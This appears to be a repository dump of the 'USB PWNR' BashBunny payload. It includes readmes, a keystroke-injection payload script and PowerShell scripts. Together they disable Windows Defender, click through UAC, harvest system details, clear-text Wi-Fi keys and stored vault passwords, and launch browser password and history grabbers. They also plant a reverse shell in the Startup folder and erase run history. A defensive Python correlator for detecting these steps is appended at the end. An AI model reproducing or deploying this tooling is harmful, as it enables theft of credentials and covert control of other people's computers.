17 | | Amber | Attack Setup | 18 | | Green | Attack Complete | 19 | 20 | #No discussion jet! 
21 | 22 | -------------------------------------------------------------------------------- /USB-PWNR/Payloads-Readme-s/readme-InfoGrabber.md: -------------------------------------------------------------------------------- 1 | # Info Grabber for the BashBunny 2 | 3 | Original Author Simen Kjeserud 4 | 5 | V2.0 Author: DannyK999 6 | 7 | Version: Version 2.0 8 | 9 | Credit: Hak5Darren, Hak5 and Simen Kjeserud for inspiration 10 | 11 | 12 | ((`\ 13 | ___ \\ '--._ 14 | .'` `' o ) 15 | / \ '. __.' 16 | _| /_ \ \_\_ 17 | {_\______\-'\__\_\ 18 | Check out Simen's website: 19 | aknemis.com 20 | 21 | ## Description 22 | 23 | Gather a lot of information about the computer and place it in a text file in loot/info/. 24 | 25 | Updates include code/output cleanup, faster runtime, and more veiled execution. 26 | 27 | Here you can se what it will look like: 28 | 29 | 30 | System Information for: DESKTOP-9BVPPVN 31 | 32 | Manufacturer: Dell Inc. 33 | 34 | Model: XPS 13 9360 35 | 36 | Serial Number: ******* 37 | 38 | CPU: Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz 39 | 40 | HDD Capacity: 464.38GB 41 | 42 | HDD Space: 82.32 % Free (382.28GB) 43 | 44 | RAM: 15.89GB 45 | 46 | Operating System: Microsoft Windows 10 Home, Service Pack: 0 47 | 48 | User logged In: DESKTOP-9BVPPVN\aknem 49 | 50 | Last Reboot: 02/21/2017 19:49:30 51 | 52 | Computers MAC adress: **************** 53 | 54 | Computers IP adress: *********** 55 | 56 | Public IP adress: **************** 57 | 58 | RDP: RDP is NOT enabled 59 | 60 | 61 | | ProfileName | SSID | Password | 62 | | ---------------- | ------------------------------------- | ------------------------------------- | 63 | | privatsna11234 | privatsna11234 | ******** | 64 | | privatsna11234 | privatsna11234 | ******** | 65 | 66 | 67 | 68 | ## Configuration 69 | 70 | Made for windows. The only thing you will need to change is the Ducky language so it matches the keyboard input. 
71 | 72 | ## STATUS 73 | 74 | | LED | Status | 75 | | ---------------- | ------------------------------------- | 76 | | Purple (blinking)| Attack in progress | 77 | | Green | Attack Finished | 78 | 79 | 80 | 81 | ## Discussion (Not yet created) 82 | [Hak5 Forum Thread not yet created](https://forums.hak5.org/index.php?/topic/ "Hak5 Forum Thread") 83 | -------------------------------------------------------------------------------- /USB-PWNR/Payloads-Readme-s/readme-reverse-shell.md: -------------------------------------------------------------------------------- 1 | # Reverse-Shell 2 | 3 | * Author: speedy22013 4 | * Creds: speedy22013 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Copy's the file servicehost.txt to startup directory: shell:startup and executes it. 10 | 11 | ##Configruation 12 | #Place a file servicehost.whatever in Bashbunny/payloads 13 | #Replace the text: servicehost.txt in payload.txt as well as in the copy-reverse.txt file with servicehost.whatever 14 | #(Whatever) = the filetype you have selected as your reverse shell 15 | 16 | 17 | | LED | Status | 18 | | ------------------ | -------------------------------------------- | 19 | | Amber | Attack Setup | 20 | | Green | Attack Complete | 21 | 22 | #No discussion jet! 
23 | 24 | -------------------------------------------------------------------------------- /USB-PWNR/disable-anti-virus.ps1: -------------------------------------------------------------------------------- 1 | if (!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs; exit } 2 | 3 | Set-MpPreference -DisableRealtimeMonitoring $true -------------------------------------------------------------------------------- /USB-PWNR/info.ps1: -------------------------------------------------------------------------------- 1 | # Shows details of currently running PC 2 | # Simen Kjeserud (Original creator), Gachnang, DannyK999 (Version 2.0) 3 | 4 | #Get info about pc 5 | 6 | # Get IP / Nework Info 7 | try 8 | { 9 | $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content 10 | } 11 | catch 12 | { 13 | $computerPubIP="Error getting Public IP" 14 | } 15 | $computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1} 16 | $IsDHCPEnabled = $false 17 | $Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? 
{$_.IPEnabled} 18 | foreach ($Network in $Networks) { 19 | If($network.DHCPEnabled) { 20 | $IsDHCPEnabled = $true 21 | } 22 | [string[]]$computerMAC =$Network.MACAddress 23 | } 24 | 25 | #Get System Info 26 | $computerSystem = Get-CimInstance CIM_ComputerSystem 27 | $computerBIOS = Get-CimInstance CIM_BIOSElement 28 | 29 | $computerOs=Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List 30 | $computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List 31 | $computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List 32 | 33 | $computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} 34 | $computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table 35 | 36 | # Get HDDs 37 | $driveType = @{ 38 | 2="Removable disk " 39 | 3="Fixed local disk " 40 | 4="Network disk " 41 | 5="Compact disk "} 42 | $Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; 
align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } 43 | 44 | # Check RDP 45 | $RDP 46 | if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) { 47 | $RDP = "RDP is Enabled" 48 | } else { 49 | $RDP = "RDP is NOT enabled" 50 | } 51 | 52 | # Get Network Interfaces 53 | $Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress 54 | 55 | # Get wifi SSIDs and Passwords 56 | $WLANProfileNames =@() 57 | #Get all the WLAN profile names 58 | $Output = netsh.exe wlan show profiles | Select-String -pattern " : " 59 | #Trim the output to receive only the name 60 | Foreach($WLANProfileName in $Output){ 61 | $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim() 62 | } 63 | $WLANProfileObjects =@() 64 | #Bind the WLAN profile names and also the password to a custom object 65 | Foreach($WLANProfileName in $WLANProfileNames){ 66 | #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user 67 | try{ 68 | $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim() 69 | }Catch{ 70 | $WLANProfilePassword = "The password is not stored in this profile" 71 | } 72 | #Build the object and add this to an array 73 | $WLANProfileObject = New-Object PSCustomobject 74 | $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName 75 | $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword 76 | $WLANProfileObjects += $WLANProfileObject 77 | Remove-Variable WLANProfileObject 78 | } 79 | 80 | # 
local-user 81 | $luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID 82 | 83 | # process first 84 | $process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine 85 | 86 | # Get Listeners / ActiveTcpConnections 87 | $listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess 88 | $listener = $listener | foreach-object { 89 | $listenerItem = $_ 90 | $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess }) 91 | new-object PSObject -property @{ 92 | "LocalAddress" = $listenerItem.LocalAddress 93 | "RemoteAddress" = $listenerItem.RemoteAddress 94 | "State" = $listenerItem.State 95 | "AppliedSetting" = $listenerItem.AppliedSetting 96 | "OwningProcess" = $listenerItem.OwningProcess 97 | "ProcessName" = $processItem.ProcessName 98 | } 99 | } | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table 100 | 101 | # process last 102 | $process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine 103 | 104 | # service 105 | $service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName 106 | 107 | # installed software (get uninstaller) 108 | $software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize 109 | 110 | # drivers 111 | $drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, 
DriverVersion 112 | 113 | # videocard 114 | $videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution 115 | 116 | #Get stored passwords 117 | [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] 118 | $vault = New-Object Windows.Security.Credentials.PasswordVault 119 | $vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } 120 | 121 | #The output 122 | Clear-Host 123 | Write-Host 124 | 125 | $computerSystem.Name 126 | "==================================================================" 127 | "Manufacturer: " + $computerSystem.Manufacturer 128 | "Model: " + $computerSystem.Model 129 | "Serial Number: " + $computerBIOS.SerialNumber 130 | "" 131 | "" 132 | "" 133 | 134 | "OS:" 135 | "=================================================================="+ ($computerOs| out-string) 136 | 137 | "CPU:" 138 | "=================================================================="+ ($computerCpu| out-string) 139 | 140 | "RAM:" 141 | "==================================================================" 142 | "Capacity: " + $computerRamCapacity+ ($computerRam| out-string) 143 | 144 | "Mainboard:" 145 | "=================================================================="+ ($computerMainboard| out-string) 146 | 147 | "Bios:" 148 | "=================================================================="+ (Get-WmiObject win32_bios| out-string) 149 | 150 | 151 | 152 | "Local-user:" 153 | "=================================================================="+ ($luser| out-string) 154 | 155 | "HDDs:" 156 | "=================================================================="+ ($Hdds| out-string) 157 | 158 | "Network: " 159 | "==================================================================" 160 | "Computers MAC address: " + $computerMAC 161 | "Computers IP address: " + $computerIP.ipaddress[0] 162 | "Public IP address: " + $computerPubIP 
163 | "RDP: " + $RDP 164 | "" 165 | ($Network| out-string) 166 | 167 | "W-Lan profiles: " 168 | "=================================================================="+ ($WLANProfileObjects| out-string) 169 | 170 | "listeners / ActiveTcpConnections" 171 | "=================================================================="+ ($listener| out-string) 172 | 173 | "Current running process: " 174 | "=================================================================="+ ($process| out-string) 175 | 176 | "Services: " 177 | "=================================================================="+ ($service| out-string) 178 | 179 | "Installed software:" 180 | "=================================================================="+ ($software| out-string) 181 | 182 | "Installed drivers:" 183 | "=================================================================="+ ($drivers| out-string) 184 | 185 | "Installed videocards:" 186 | "==================================================================" + ($videocard| out-string) 187 | 188 | "Windows/user passwords" 189 | "==================================================================" 190 | $vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize 191 | -------------------------------------------------------------------------------- /USB-PWNR/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #USB PWNR 4 | #P0WNS a computer in seconds 5 | 6 | #CONFIGURATION BELOW!!! 
7 | 8 | #Delay CONFIGURATION 9 | #Edit the lines below to change the standard delays in the script 10 | #SFD = Super Fast delay (waiting for CTRL v for example) FASTMODE(standard)=100 SLOWMODE=500 11 | SFD="100" 12 | #FD = Fast delay (waiting for CTRL v for example) FASTMODE(standard)=500 SLOWMODE=1000 13 | FD="500" 14 | #ND = Normal delay (waiting for programs to shut off) FASTMODE(standard)=1000 SLOWMODE=2000 15 | ND="1000" 16 | #LD = Long delay (waiting for programs to start or bash scipts to execute) FASTMODE(standard)=1500 SLOWMODE=3500 17 | LD="1500" 18 | 19 | #Reverse shell CONFIGURATION 20 | #Edit the line below to copy a reverse shell and execute it or not ("#" = Not copy/execute "" = do copy and execute) 21 | RS="#" 22 | 23 | #Target ip CONFIGURATION 24 | #Edit the line below if you want to get the targets IP ("#" = Do not save target ip "" = save target ip) 25 | TP="#" 26 | 27 | #Shutting off CONFIGURATION 28 | #Edit the line below to shut the bunny off after finishing ("" = turn off / "#" = Do not turn off) 29 | AM="#" 30 | 31 | #Editing text below this line may prevent the script from working! 
32 | 33 | #Setup 34 | LED SETUP 35 | ATTACKMODE HID STORAGE 36 | GET SWITCH_POSITION 37 | GET TARGET_IP 38 | #Wait for the computer to recognise the drive etc 39 | Q delay $LD 40 | Q delay $LD 41 | Q delay $LD 42 | #Disable AntiVirus (Windows Defender) 43 | RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')" 44 | #Bypass UAC 45 | Q DELAY $ND 46 | Q LEFT 47 | Q ENTER 48 | #Get drive letter and copy it: 49 | RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetDrive.ps1')" 50 | Q DELAY $ND 51 | 52 | #InfoGrabber 53 | LED STAGE1 54 | RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" 55 | DELAY $LD 56 | 57 | #BPG (BrowserPasswordGrabber) 58 | LED STAGE2 59 | RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\pass.exe')" 60 | Q DELAY $LD 61 | Q CONTROL a 62 | Q DELAY $FD 63 | Q CONTROL s 64 | Q DELAY $FD 65 | Q STRING %computername% - Pass 66 | Q F4 67 | Q DELAY $SFD 68 | Q CONTROL a 69 | Q DELAY $SFD 70 | Q CONTROL v 71 | Q DELAY $SFD 72 | Q STRING 'loot\USB_PWNR' 73 | Q DELAY $SFD 74 | Q ENTER 75 | Q DELAY $FD 76 | Q TAB 77 | Q TAB 78 | Q TAB 79 | Q TAB 80 | Q TAB 81 | Q TAB 82 | Q ENTER 83 | Q DELAY $SFD 84 | Q ALT F4 85 | 86 | #BHG (BrowserHistoryGrabber) 87 | LED STAGE 3 88 | RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\history.exe')" 89 | Q DELAY $LD 90 | Q ENTER 91 | Q DELAY $LD 92 | Q DELAY $LD 93 | Q CONTROL a 94 | Q DELAY $FD 95 | Q CONTROL s 96 | Q DELAY $FD 97 | Q STRING %computername% - History 98 | Q F4 99 | Q DELAY $SFD 100 | Q CONTROL a 101 | Q DELAY $SFD 102 | Q CONTROL v 103 | Q DELAY $SFD 104 | Q STRING 'loot\USB_PWNR' 105 | Q DELAY $SFD 106 | Q ENTER 107 | Q DELAY $FD 108 | Q TAB 109 | Q 
TAB 110 | Q TAB 111 | Q TAB 112 | Q TAB 113 | Q TAB 114 | Q ENTER 115 | Q DELAY $SFD 116 | Q ALT F4 117 | 118 | #Copy reverse shell file to shell:startup and start it 119 | LED STAGE4 120 | Q GUI r 121 | Q DELAY $SFD 122 | Q STRING powershell 123 | Q ENTER 124 | Q DELAY $FD 125 | $RS Q STRING copy 126 | $RS Q SPACE 127 | $RS Q CONTROL v 128 | $RS Q BACKSPACE 129 | $RS Q STRING 'payloads\servicehost.txt' "'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'" 130 | $RS Q ENTER 131 | $RS Q DELAY $FD 132 | $RS Q STRING start "'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicehost.txt'" 133 | $RS Q ENTER 134 | $RS Q DELAY $LD 135 | $RS Q DELAY $LD 136 | 137 | # Get Target IP 138 | $TP Q STRING cd 139 | $TP Q SPACE 140 | $TP Q CONTROL v 141 | $TP Q BACKSPACE 142 | $TP Q STRING '\loot' 143 | $TP Q ENTER 144 | $TP Q DELAY $SFD 145 | $TP Q STRING '$ipV4 = Test-Connection -ComputerName (hostname) -Count 1 | Select IPV4Address >>' 146 | $TP Q SPACE 147 | $TP Q CNTRL v 148 | $TP Q DELAY $SFD 149 | $TP Q BACKSPACE 150 | $TP Q STRING '\loot\USB_PWNR\ip.txt' 151 | $TP Q ENTER 152 | $TP Q DELAY $SFD 153 | Q STRING exit 154 | Q ENTER 155 | Q DELAY $SFD 156 | 157 | #Cleaning up fase 158 | LED CLEANUP 159 | RUN WIN powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 160 | Q ENTER 161 | 162 | LED FINISH 163 | $AM ATTACKMODE OFF 164 | -------------------------------------------------------------------------------- /USB-PWNR/readme.md: -------------------------------------------------------------------------------- 1 | # USB PWNR V2 2 | 3 | ````` 4 | + __ _______ ____ ____ _ ___ ______ 5 | + / / / / ___// __ ) / __ \ | / / | / / __ \ 6 | + / / / /\__ \/ __ | / /_/ / | /| / / |/ / /_/ / 7 | +/ /_/ /___/ / /_/ / / ____/| |/ |/ / /| / _, _/ 8 | +\____//____/_____/ /_/ |__/|__/_/ |_/_/ |_| 9 | 10 | ````` 11 | 12 | * Written by: C1PH3R 
13 | * Creds: C1PH3R, Hak5Darren, Nirsoft 14 | * Target: Windows 15 | 16 | # Description: 17 | 18 | # Starts up multiple programs: 19 | 20 | - [x] BPG (BrowserPasswordGrabber): Grabs passwords from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 21 | - [x] BHG (BrowserHistoryGrabber): Grabs history from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 22 | - [x] InfoGrabber: Gather a lot of information about the computer and place it in a text file in loot/info/. 23 | - [x] Reverse-Shell: Copy's the file servicehost.txt to startup directory: shell:startup and executes it. 24 | - [x] Ip grabber. 25 | 26 | # Configuration: 27 | * Required: download the binary files and put them in the switch position you chose: 28 | https://github.com/CIPH3R0/BashBunny/tree/master/Binary-s/USB%20PWNR 29 | * Optional: edit the "Delay CONFIGURATION" in payload file to your preferences to make the payload work with slower/older or faster/newer computers 30 | * Optional: edit the "Shutting off CONFIGURATION" in the payload file to shut the bunny off after the payload is done 31 | * Optional: edit the "Target ip CONFIGURATION" in the payload file to grab the ip of the victim 32 | * Optional: edit the "Reverse shell CONFIGURATION" in the payload file to use reverse_shell 33 | * When using a reverse_shell follow steps below 34 | * Place a file servicehost.whatever in Bashbunny/payloads 35 | * Replace the text: servicehost.txt in payload.txt file with servicehost.whatever (Whatever = the filetype you have selected as your reverse shell) 36 | 37 | 38 | 39 | | LED | Status | 40 | | ------------------ | -------------------------------------------- | 41 | | Amber | Attack Setup | 42 | | Stage (blinking) | Bussy (do not remove stick) | 43 | | Green | Attack Complete | 44 | | Red | Fail | 45 | 46 | * No discussion jet! 47 | 48 | # "Don't look at the branch of the problem, look at the root! 
(C1PH3R)" 49 | -------------------------------------------------------------------------------- /USB-PWNR/run.ps1: -------------------------------------------------------------------------------- 1 | #Remove run history 2 | powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 3 | 4 | #Get the path and file name that you are using for output 5 | # find connected bashbunny drive: 6 | $VolumeName = "bashbunny" 7 | $computerSystem = Get-CimInstance CIM_ComputerSystem 8 | $backupDrive = $null 9 | get-wmiobject win32_logicaldisk | % { 10 | if ($_.VolumeName -eq $VolumeName) { 11 | $backupDrive = $_.DeviceID 12 | } 13 | } 14 | 15 | #See if a loot folder exist in usb. If not create one 16 | $TARGETDIR = $backupDrive + "\loot" 17 | if(!(Test-Path -Path $TARGETDIR )){ 18 | New-Item -ItemType directory -Path $TARGETDIR 19 | } 20 | 21 | #See if a loot folder exist in loot folder. If not create one 22 | $TARGETDIR = $backupDrive + "\loot\info" 23 | if(!(Test-Path -Path $TARGETDIR )){ 24 | New-Item -ItemType directory -Path $TARGETDIR 25 | } 26 | 27 | #See if a USB_PWNR folder exist in loot folder. If not create one 28 | $TARGETDIR = $backupDrive + "\loot\USB_PWNR" 29 | if(!(Test-Path -Path $TARGETDIR )){ 30 | New-Item -ItemType directory -Path $TARGETDIR 31 | } 32 | 33 | #Create a path that will be used to make the file 34 | $datetime = get-date -f yyyy-MM-dd_HH-mm 35 | $backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt" 36 | 37 | #Create output from info script 38 | $TARGETDIR = $MyInvocation.MyCommand.Path 39 | $TARGETDIR = $TARGETDIR -replace ".......$" 40 | cd $TARGETDIR 41 | PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath 42 | --------------------------------------------------------------------------------
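Seen from the detection side, the scripts above leave a tight cluster of distinctive command lines on one host within about a minute: a volume-label lookup used to launch scripts, Defender real-time monitoring switched off, Wi-Fi keys and the credential vault read out, and the RunMRU key wiped. The following Python correlator is an added example, not part of this repository; the log records are constructed, and the rule names, weights, 120-second window, threshold and the `switch1` folder name are assumptions.

```python
import re
from datetime import datetime, timedelta

# (rule name, weight, pattern). Patterns mirror command lines in the scripts
# on this page; names and weights are assumptions of this example.
RULES = [
    ("defender_rtm_off", 5, re.compile(
        r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(\$true|1)\b", re.I)),
    ("vault_dump", 5, re.compile(r"\.Retrieve(All|Password)\(\)", re.I)),
    ("wifi_key_dump", 4, re.compile(
        r"netsh(\.exe)?\s+wlan\s+show\s+profiles?\b.*key\s*=\s*clear", re.I)),
    ("volume_label_exec", 4, re.compile(
        r"\b(gwmi|Get-WmiObject|Get-CimInstance)\b.*win32_volume.*label\s*=", re.I)),
    ("runmru_wipe", 3, re.compile(r"Remove-ItemProperty\b.*Explorer\\RunMRU", re.I)),
    # Weak on its own: hidden window combined with an execution-policy bypass.
    ("hidden_bypass", 1, re.compile(
        r"^(?=.*-w\w*\s+hidden)(?=.*-e[xp]\w*\s+bypass)", re.I | re.S)),
]

# Constructed records, shaped like process-creation / script-block log entries.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:02:01", "host": "WS-014", "command":
     r"Powershell -nop -ex Bypass -w Hidden .((gwmi win32_volume -f "
     r"'label=''BashBunny''').Name+'payloads\switch1\disable-anti-virus.ps1')"},
    {"time": "2024-05-01T10:02:04", "host": "WS-014", "command":
     "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"time": "2024-05-01T10:02:20", "host": "WS-014", "command":
     'netsh.exe wlan show profiles name="HomeNet" key=clear'},
    {"time": "2024-05-01T10:02:21", "host": "WS-014", "command":
     "$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }"},
    {"time": "2024-05-01T10:03:10", "host": "WS-014", "command":
     r"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows"
     r"\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"},
    # Routine administration that must not alert.
    {"time": "2024-05-01T10:05:00", "host": "ADMIN-02", "command":
     "netsh wlan show profiles"},
    {"time": "2024-05-01T10:05:30", "host": "ADMIN-02", "command":
     "Get-MpPreference | Select DisableRealtimeMonitoring"},
    {"time": "2024-05-01T10:06:00", "host": "ADMIN-02", "command":
     r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    # Two real hits, but hours apart: outside the correlation window.
    {"time": "2024-05-01T09:00:00", "host": "HELPDESK-07", "command":
     r"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows"
     r"\CurrentVersion\Explorer\RunMRU' -Name '*'"},
    {"time": "2024-05-01T11:30:00", "host": "HELPDESK-07", "command":
     "Set-MpPreference -DisableRealtimeMonitoring $true"},
]


def match_rules(command):
    """Return [(rule name, weight)] for every rule the command line matches."""
    return [(name, weight) for name, weight, rx in RULES if rx.search(command)]


def correlate(events, window=timedelta(seconds=120), threshold=8):
    """Alert on hosts showing >= 2 distinct behaviours inside one time window."""
    per_host = {}
    for ev in events:
        hits = match_rules(ev["command"])
        if hits:
            stamp = datetime.fromisoformat(ev["time"])
            per_host.setdefault(ev["host"], []).append((stamp, hits))
    alerts = []
    for host, hits in sorted(per_host.items()):
        hits.sort(key=lambda h: h[0])
        best = None
        for i, (start, _) in enumerate(hits):
            seen, end = {}, start
            for stamp, rule_hits in hits[i:]:
                if stamp - start > window:
                    break
                seen.update(rule_hits)  # each distinct rule is counted once
                end = stamp
            score = sum(seen.values())
            if best is None or score > best["score"]:
                best = {"host": host, "start": start, "end": end,
                        "rules": sorted(seen), "score": score}
        if best["score"] >= threshold and len(best["rules"]) >= 2:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert["host"], alert["score"], alert["rules"])
```

Requiring two distinct behaviours keeps a lone `Set-MpPreference` change or a single RunMRU cleanup from paging anyone, while the chained sequence still scores well above the threshold.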